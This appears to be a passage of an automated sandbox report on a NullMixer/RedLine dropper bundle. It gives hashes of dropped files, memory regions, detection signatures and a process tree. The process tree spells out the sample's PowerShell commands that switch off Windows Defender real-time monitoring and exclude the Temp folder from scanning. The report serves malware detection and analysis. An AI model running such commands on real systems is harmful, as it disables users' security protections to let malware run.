| SHA256 | 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae |
| SHA512 | dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed062a0488e6dd1.exe
| MD5 | c950dfa870dc50ce6e1e2fcaeb362de4 |
| SHA1 | fc1fb7285afa8d17010134680244a19f9da847a1 |
| SHA256 | b7fd0c0227a445847a051fe986bc517e2b136682d98dbe5349e2bc75e0e9e4ec |
| SHA512 | 4117875063173b5767b98300d493e2aee310a76651411ceb2f34588ae5785a0893979699c10e07d0f52d84442db6967b7155875bc7ef738a8e2c49fa70acd1f2 |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed068cfd71e196da.exe
| MD5 | 91e3bed725a8399d72b182e5e8132524 |
| SHA1 | 0f69cbbd268bae2a7aa2376dfce67afc5280f844 |
| SHA256 | 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d |
| SHA512 | 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76 |
memory/4364-97-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed0639114ac9fa.exe
| MD5 | 962b4643e91a2bf03ceeabcdc3d32fff |
| SHA1 | 994eac3e4f3da82f19c3373fdc9b0d6697a4375d |
| SHA256 | d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b |
| SHA512 | ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd |
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\Wed06d8092a5ae.exe
| MD5 | b4c503088928eef0e973a269f66a0dd2 |
| SHA1 | eb7f418b03aa9f21275de0393fcbf0d03b9719d5 |
| SHA256 | 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2 |
| SHA512 | c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465 |
memory/3816-103-0x00000000061D0000-0x0000000006236000-memory.dmp
memory/1892-118-0x0000000000070000-0x0000000000078000-memory.dmp
memory/4060-121-0x00000000051C0000-0x0000000005236000-memory.dmp
memory/5068-126-0x0000000000BA0000-0x0000000000C10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-U1OCG.tmp\Wed067fa7edd4b875a.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/4060-127-0x0000000005160000-0x000000000517E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-JIEQ4.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/4060-147-0x00000000058F0000-0x0000000005E94000-memory.dmp
memory/2508-125-0x00000000021C0000-0x00000000021C6000-memory.dmp
memory/2892-152-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4060-119-0x0000000000950000-0x00000000009C0000-memory.dmp
memory/3816-79-0x0000000005A30000-0x0000000006058000-memory.dmp
memory/3816-158-0x0000000006BD0000-0x0000000006C1C000-memory.dmp
memory/3816-156-0x0000000006850000-0x000000000686E000-memory.dmp
memory/2556-155-0x0000000000400000-0x00000000004BD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-T84SO.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/4364-161-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4908-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-71-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4908-68-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4908-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4908-65-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-64-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/4908-181-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3712-171-0x0000000000400000-0x0000000002DAA000-memory.dmp
memory/4908-176-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4908-172-0x0000000000400000-0x000000000051C000-memory.dmp
memory/4908-180-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4908-179-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4908-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4908-67-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4908-66-0x0000000064941000-0x000000006494F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS074623C7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/3816-202-0x0000000006DE0000-0x0000000006DFE000-memory.dmp
memory/3816-192-0x000000006F400000-0x000000006F44C000-memory.dmp
memory/3816-190-0x0000000006E00000-0x0000000006E32000-memory.dmp
memory/3816-215-0x00000000078E0000-0x0000000007983000-memory.dmp
memory/1360-216-0x0000000005910000-0x0000000005A1A000-memory.dmp
memory/1784-205-0x000000006F400000-0x000000006F44C000-memory.dmp
memory/1360-218-0x0000000005880000-0x00000000058BC000-memory.dmp
memory/1360-204-0x00000000057E0000-0x00000000057F2000-memory.dmp
memory/3816-220-0x00000000078B0000-0x00000000078CA000-memory.dmp
memory/3816-219-0x0000000008210000-0x000000000888A000-memory.dmp
memory/1360-203-0x0000000005D90000-0x00000000063A8000-memory.dmp
memory/1360-187-0x0000000000400000-0x0000000000422000-memory.dmp
memory/3816-221-0x0000000007BF0000-0x0000000007BFA000-memory.dmp
memory/3816-222-0x0000000007DE0000-0x0000000007E76000-memory.dmp
memory/1784-223-0x0000000007590000-0x00000000075A1000-memory.dmp
memory/3816-236-0x0000000007DA0000-0x0000000007DAE000-memory.dmp
memory/3816-237-0x0000000007DB0000-0x0000000007DC4000-memory.dmp
memory/3816-239-0x0000000007EA0000-0x0000000007EBA000-memory.dmp
memory/1784-241-0x00000000076B0000-0x00000000076B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM
| MD5 | b3eb9fd17e8ad098cabb8c902e9e229b |
| SHA1 | 496db608d89ede6d7e52cc12c87fd51985d77dd3 |
| SHA256 | 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7 |
| SHA512 | 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9 |
C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\nytFSko.4
| MD5 | f07fb7ba321155969395fd0bb1b66ecd |
| SHA1 | c33f97f3bcd9152263cd3a267f7718bfe74871d4 |
| SHA256 | 3b408cb12cfc6e064674313ac9b2bc6e5c479209432d8a24d60638230e6d09ee |
| SHA512 | 90e444d2035dc5d64ad62f2ced9227a9f0227a97a358afc987d4efa6a93d1adc3eb8f329a670088eade9e6fd863ed8c2a6e194278c9c61eb12db90c6c04cb1cd |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 968cb9309758126772781b83adb8a28f |
| SHA1 | 8da30e71accf186b2ba11da1797cf67f8f78b47c |
| SHA256 | 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a |
| SHA512 | 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 063b7b7f9c0886b614c653a6b7662a42 |
| SHA1 | 71cec24bca03a1c28886bf664897acbecb485989 |
| SHA256 | b26ffcf41deb034f51beab3f8093fa89b53007f2bdff9d42a7dd53dce88d1078 |
| SHA512 | 335debd30473e9f1497def7dcfa9f6c4f8ea156d1095c93427f22f937af7e4fc8bee9e75fc524201db56089eaa6366a09c64591c975636cb95336102cf2172ab |
memory/4788-254-0x0000000003120000-0x000000000327D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n
| MD5 | 102c7b74c9389ba3f6b3edc9d78354a5 |
| SHA1 | 1f87d39721fc1248b480f3d34f53fa06881a9e60 |
| SHA256 | a0c96cecc558707b247549e2a4543d354270f8747f2c493cd1be2adb332f991e |
| SHA512 | 9e404873661be23cd92eaada3eb8e16101df306af7eda46cc35a37c59131c1452ef50d465ef7f84a222fadf8821c24ffaa93e6b2c030ba93c44623aa7106077d |
C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1
| MD5 | 3d4be60221c31167e0880e394bfc4da9 |
| SHA1 | 406ce7505abb85bfe841b043a3c0c9fc4accf6c5 |
| SHA256 | 736b628abd066f9bbc93148f2060e750fb8e7d1df03b6a5ab4501e1b0a7ac6db |
| SHA512 | b08998c99352173c7d016f344292362b31b66dcb78a333a4b0deb25c0abcfcade3db9687b6e1bf866d882a0c3490b2f5d7da1e4f460eff39745df823b93ce806 |
C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT
| MD5 | 6dd35c1b829aa136dfa8d19a3d925b02 |
| SHA1 | 5443dde6e8c2948dfa2626d58c7cf957ea9fcd2c |
| SHA256 | 07e1aecb0743f29ce796de864144cfc7d64af919ca1445dc286d1be217a94298 |
| SHA512 | 536a26d31e795b8c7a8b3a4b8855465dd6b287410e2c2e41d7b5ed0dccff63757d50f3a6a85455537be16515064d801c04262b391e6a81d89540f88f6532072d |
C:\Users\Admin\AppData\Local\Temp\SVnzW.C2
| MD5 | 1046521a4754730fa8d91ffe7bb86dd7 |
| SHA1 | c588fef06fa101c894d165cf58b0d930b84f32bb |
| SHA256 | de20c6946360e923936c865b9d44e038e6046ca2c733043010913f3ed94ebfc5 |
| SHA512 | ec2ba5fde73358c65eec9e3dd61e32574a34ac580d2f0afb9f545818cbaedc2d7342f4e20dcb3e57250a1e350c3a9e05ab3fee0b3fe90feeb2fdbb34cb0654c8 |
C:\Users\Admin\AppData\Local\Temp\OJM3YR.x
| MD5 | 560cd503ea8d56af71af388068c37a0a |
| SHA1 | e33edf708a7dde97afca2f5dc04b3de35a55c5ad |
| SHA256 | f5ba7d73b7deed6a565cba19773085927dc34123633e466129a4a7a6be840cc4 |
| SHA512 | 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996 |
memory/4788-259-0x0000000003630000-0x00000000036D7000-memory.dmp
memory/4788-260-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/4788-263-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/4788-261-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/2892-265-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1036-266-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/864-270-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4788-271-0x0000000003120000-0x000000000327D000-memory.dmp
memory/4788-280-0x00000000036E0000-0x0000000003774000-memory.dmp
memory/4788-282-0x0000000005740000-0x00000000057CD000-memory.dmp
memory/4788-281-0x0000000003780000-0x000000000573B000-memory.dmp
memory/4788-286-0x00000000057E0000-0x0000000005869000-memory.dmp
memory/4788-283-0x00000000057E0000-0x0000000005869000-memory.dmp
memory/4788-287-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
memory/4788-288-0x0000000000EB0000-0x0000000000EB4000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20240708-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 344 set thread context of 2780 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\control.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\09xU.exE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe
"C:\Users\Admin\AppData\Local\Temp\096fc162ed138cc3d9ee62631325c0d7d2957d6a1b7eec705da59004b83fd6c8.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0663b341399ee.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat062000ca9aa6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0647140c100d63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat060fd7e42d2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06f5ed0e3bb24.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0619212f22dd7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat06ebc37d1c94352.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0618d93ac2c5c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe
Sat0647140c100d63.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe
Sat06ebc37d1c94352.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe
Sat0663b341399ee.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe
Sat0675f75df01bdb.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe
Sat062000ca9aa6.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe
Sat0619212f22dd7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06f5ed0e3bb24.exe
Sat06f5ed0e3bb24.exe
